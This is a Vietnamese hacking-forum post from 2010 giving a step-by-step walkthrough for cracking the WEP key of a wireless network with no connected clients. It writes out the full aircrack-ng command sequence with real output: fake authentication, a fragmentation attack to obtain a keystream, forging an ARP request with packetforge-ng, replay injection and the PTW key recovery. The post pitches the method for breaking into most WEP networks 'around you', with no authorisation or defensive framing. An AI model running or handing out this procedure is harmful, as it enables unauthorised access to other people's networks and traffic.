Home...Kamosu s2 all
Bạn hãy ủng hộ forum bằng cách đăng kí làm thành viên nhé! Việc đăng kí rất đơn giản và không cần phải kích hoạt!
Sau khi đăng kí, bạn hãy đăng nhập và tham gia post bài ngay! Mỗi bài viết của bạn là một đóng góp quý báu cho LA9x Forum!
Chúc bạn một ngày vui vẻ!
Home...Kamosu s2 all
Bạn hãy ủng hộ forum bằng cách đăng kí làm thành viên nhé! Việc đăng kí rất đơn giản và không cần phải kích hoạt!
Sau khi đăng kí, bạn hãy đăng nhập và tham gia post bài ngay! Mỗi bài viết của bạn là một đóng góp quý báu cho LA9x Forum!
Chúc bạn một ngày vui vẻ!
Home...Kamosu s2 all
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.



 
Trang ChínhLa9xTìm kiếmLatest imagesĐăng kýĐăng Nhập

Share | 
  Cách dò khóa WEP khi không có client nào kết nối đến access pointXem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Bài gửiTiêu đề: Cách dò khóa WEP khi không có client nào kết nối đến access pointCách dò khóa WEP khi không có client nào kết nối đến access point EmptyFri Jul 23, 2010 6:59 am
Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_01Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_02Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_03
Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_04KamosuCách dò khóa WEP khi không có client nào kết nối đến access point Thtx_06
Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_07Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_08Cách dò khóa WEP khi không có client nào kết nối đến access point Thtx_09
Kamosu
Admin

Admin

http://la9x.tk
Thông tin thành viên :
Click !Bài gửi : 151
Được thank : 0
Đến từ : Hai? Pho`ng

Chủ đề : Cách dò khóa WEP khi không có client nào kết nối đến access point
--------------------------------------------------


Giờ mà viết bài crack wep thì nghe có vẻ lỗi thời
nhỉ, dùng công nghệ của năm 2010 để bẻ khóa công nghệ của những năm
2000. Nhưng thực tế thì có đến 30-40% số mạng không dây hiện tại vẫn
dùng phương pháp mã hóa yếu ớt này. Do vậy đề tài dò khóa wep luôn là
một đề tài được nhiều người quan tâm



Thông thường crack wep khá dễ, nhưng đó là đối với các mạng đang có
client kết nối. Khi client dùng mạng thì thi thoảng sẽ tạo ra những gói
ARP request và ta sẽ bắt gói tin này, bơm liên tục vào access point
khiến cho access point phải “nhả” key ra cho ta dùng. Tuy nhiên đối với
mạng không có client thì sao, sẽ không có ARP request để mà bơm, do vậy
ta phải tự “tạo” ra một gói ARP làm sao cho access point tưởng đó là
thật mà nhả key ra

Bài này sử dụng file iso Backtrack 4.0 final và usb wifi TP-Link
WN321G, cả 2 đều được mount vào máy ảo VMware để có thể vừa dò vừa viết
log

Sau khi quét phát hiện thấy mạng ACTIONTEC sóng khá tốt nhưng ko hề
có data, tức ko có client nào kết nối

Code:

Trích dẫn :
[CH 7 ][ Elapsed: 3 mins ][ 2010-01-22 22:41

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:E5:98:41:BE -73 111 223 0 11 54 . WEP WEP OPN delta
00:0F:B3:3A:76:35 -76 36 0 0 9 54 . WEP WEP ACTIONTEC
00:B0:0C:3E:12:3B -82 72 0 0 6 54 OPN TENDA
00:B0:0C:05:1A:0A -83 11 0 0 6 54 WPA2 CCMP PSK PhanBro

BSSID STATION PWR Rate Lost Packets Probes

00:1E:E5:98:41:BE 00:1D:0F:DF:E3:00 0 0 - 1 0 114
00:1E:E5:98:41:BE 00:12:F0:CA:2B:BE -1 1 - 0 0 359
(not associated) 00:1F:E1:9C:98:17 -79 0 - 1 0 19 ZyXEL
(not associated) 00:21:00:B7:DE:02 -81 0 - 1 0 19 vietdat
(not associated) 00:16:EA:C6:16:62 -37 0 - 1 0 17


Đầu tiên, sniff mạng ACTIONTEC vào file

Code:

Trích dẫn :
airodump-ng wlan0 -c 9 --bssid 00:0F:B3:3A:76:35 -w actiontec

CH 9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0F:B3:3A:76:35 -81 0 4015 0 0 9 54 . WEP WEP OPN ACTIONTEC

BSSID STATION PWR Rate Lost Packets Probes



Giả mạo làm một người dùng hợp pháp bằng tính năng fake
authentication của aireplay-ng

Code:

Trích dẫn :
aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0

root@bt:~# aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:43:11 Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9

22:43:11 Sending Authentication Request (Open System) [ACK]
22:43:11 Authentication successful
22:43:11 Sending Association Request [ACK]
22:43:11 Association successful :-) (AID: 1)
22:43:21 Sending Authentication Request (Open System)

Rình rập một chú “cừu non” đi lạc. Nguyên lý của cách tấn công
này là tóm lấy 1 packet phù hợp từ accesspoint, sử dụng các thông số có
trong packet này để tạo ra arp request. Tùy vào sự may mắn, bạn có thể
phải chờ chương trình read vài ngàn gói tin mới có thể tìm được một gói
tin ưng ý, gói tin này có chứa keystream.

Code:

Trích dẫn :
root@bt:~# aireplay-ng -5 -b 00:0F:B3:3A:76:35 wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
22:44:26 Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9
22:44:26 Waiting for a data packet...
Read 2233 packets...

size: 386, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:0F:B3:3A:76:35
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:0F:B3:3A:76:32

0x0000: 0842 0000 0100 5e7f fffa 000f b33a 7635
0x0010: 000f b33a 7632 403f aa16 ea00 41a3 9c9c
0x0020: fc66 2e21 4713 6d55 be7b b622 a5c8 47f1
0x0030: be1f 4cd4 c488 5d6c a4de 07e4 d815 88f4
0x0040: 75ae cce8 2092 854a 8101 73d4 77f4 2e80
0x0050: 1321 0747 5aaa 8025 04a2 c65e a237 794e
0x0060: 556c f897 2f02 dab6 6a13 5967 c6a2 548e
0x0070: ca0d bb21 326f 2abe 8afa aae5 9212 2ca9
0x0080: 1046 0084 0319 2b46 e651 6497 0c72 d1b1
0x0090: 2335 ffc8 111c 152e 2b49 e222 a204 06ea
0x00a0: 5594 19b3 cebf 0eaf b295 d9de 6768 595a
0x00b0: 0eb5 f86f 4349 5d75 b650 34a2 61ed 2c42
0x00c0: ce30 f519 bc72 57af 8367 bce6 d87f 3fd6
0x00d0: 7c42 fd6a 8dff 9384 a5df dfa0 292e 194a
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0122-224956.cap
22:50:00 Data packet found!
22:50:00 Sending fragmented packet
22:50:00 Got RELAYED packet!!
22:50:00 Trying to get 384 bytes of a keystream
22:50:00 Not enough acks, repeating...
22:50:00 Trying to get 384 bytes of a keystream
22:50:00 Got RELAYED packet!!
22:50:00 Trying to get 1500 bytes of a keystream
22:50:00 Got RELAYED packet!!
Saving keystream in fragment-0122-225000.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream



Dùng packetforce-ng để chế biến ra một arp request hoàn toàn hợp
lệ, giống như chú blackberry của mấy anh Hồ Cẩm Đào vậy

Code:

Trích dẫn :
root@bt:~# packetforge-ng -0 -a 00:0F:B3:3A:76:35 -h 00:1D:0F:DF:E3:00 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0122-225000.xor -w arp-req

Wrote packet to: arp-req



Có đạn rồi thì cứ lắp vào súng máy mà bắn thôi

Code:

Trích dẫn :
root@bt:~# aireplay-ng -2 -r arp-req wlan0
No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)

size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:0F:B3:3A:76:35
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1D:0F:DF:E3:00

0x0000: 0841 0201 000f b33a 7635 001d 0fdf e300
0x0010: ffff ffff ffff 8001 06cc 8500 fdf0 b56b
0x0020: aa0c d118 7897 55e7 c4c6 8806 6fca 10d9
0x0030: 2976 ea99 b1eb 35d6 097b 4702 72ec 4829
0x0040: c854 6e25

Use this packet ? y

Saving chosen packet in replay_src-0122-230028.cap
You should also start airodump-ng to capture replies.

Send 4580 packets…(499pps)




Quay lại airodump-ng xem lượng data tăng vùn vụt

Code:

Trích dẫn :
[ CH 9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0F:B3:3A:76:35 -81 0 4015 25972 442 9 54 . WEP WEP OPN ACTIONTEC

BSSID STATION PWR Rate Lost Packets Probes

00:0F:B3:3A:76:35 00:1D:0F:DF:E3:00 0 0 - 1 1 59304




Với tốc độ 500pps thì chỉ cần 30s để phá wep 64 bit, còn wep 128
bit thì lâu hơn 20 lần, khoảng 10 phút

Code:

Trích dẫn :
root@bt:~# aircrack-ng -a 1 actiontec-01.cap
Opening actiontec-01.cap
Read 53122 packets.

# BSSID ESSID Encryption

1 00:0F:B3:3A:76:35 ACTIONTEC WEP (12538 IVs)

Choosing first network as target.

Opening actiontec-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 12633 ivs.

Aircrack-ng 1.0 rc3 r1552

[00:01:33] Tested 775 keys (got 41314 IVs)

KB depth byte(vote)
0 1/ 2 5E(52736) 95(49152) 49(48896) 46(48640) 65(48384) 67(48384) 99(48128)
1 16/ 1 B6(46336) C3(45824) 73(45568) C5(45568) DF(45568) 04(45056) 2A(45056)
2 0/ 3 33(57856) C2(50944) 4B(49920) 7E(49408) 0C(48896) 76(48128) 4F(47616)
3 0/ 6 44(56064) F3(51712) 24(49920) 31(48640) 57(48640) 2F(48384) 19(48128)
4 41/ 4 B6(44800) 03(44544) 4A(44544) 6A(44544) 91(44544) A3(44544) CD(44544)

KEY FOUND! [ 11:11:11:11:11:11:11:11:11:11:11:11:11 ]
Decrypted correctly: 100%






Ngoài ra còn một số cách nữa nhưng với bài viết này bạn có thể dò
được đến 99% mạng wireless dùng WEP xung quanh, trừ những mạng xác thực
bằng RADIUS (mà thực tế rất ít).

Về Đầu Trang Go down
 

Cách dò khóa WEP khi không có client nào kết nối đến access point

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang
Trả lời nhanh - Quick reply
Permissions in this forum:Bạn không có quyền trả lời bài viết
Home...Kamosu s2 all  :: Hacking-Sercurity-Programming-Designing :: Hack cơ bản-
Host By Forumotion   Powered by Kamosu
Tên miền , Hosting    Copyright 2010 - 2011, Jelsoft Enterprises Ltd
Free forum | ©phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất